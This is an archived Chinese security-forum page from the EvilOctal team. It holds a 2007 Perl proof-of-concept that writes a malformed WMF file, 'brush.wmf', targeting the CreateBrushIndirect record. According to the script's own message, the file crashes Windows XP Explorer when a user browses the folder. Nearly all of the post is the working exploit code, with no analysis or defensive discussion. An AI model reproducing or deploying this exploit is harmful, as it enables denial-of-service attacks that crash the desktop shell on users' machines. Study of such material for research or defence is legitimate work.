./brush.wmf") or die "cannot create wmf file\n";print WMF "\x01\x00\x0 ... 邪恶八进制信息安全团队技术讨论组 国内为数不多的技术与管理并举的专业信息安全团队 - Discuz! Archiver" /> MS Windows Explorer (WMF) CreateBrushIndirect DoS Exploit(页 1) - 安全测试代码{ Exploits and Shellcode } - 邪恶八进制信息安全团队技术讨论组 努力为祖国的信息安全撑起一片蓝天 - Archiver

邪恶八进制信息安全团队技术讨论组's Archiver

pub!1c 2007-1-16 12:16

MS Windows Explorer (WMF) CreateBrushIndirect DoS Exploit

<p>[code]</p><pre>#!/usr/bin/perl

print "\nWMF PoC denial of service exploit by cyanid-E <biz4rre\@gmail.com>";
print "\n\ngenerating brush.wmf...";
open(WMF, ">./brush.wmf") or die "cannot create wmf file\n";
print WMF "\x01\x00\x09\x00\x00\x03\x22\x00\x00\x00\x63\x79\x61\x6E\x69\x64";
print WMF "\x2D\x45\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x00\x00\x00\x00";
print WMF "\x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
print WMF "\x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\x00\x80\x03\x00";
print WMF "\x00\x00\x00\x00";
close(WMF);
print "ok\n\nnow try to browse folder in XP explorer and wait :)\n";
</pre><p>[/code]</p>

页: [1]
© 1999-2008 EvilOctal Security Team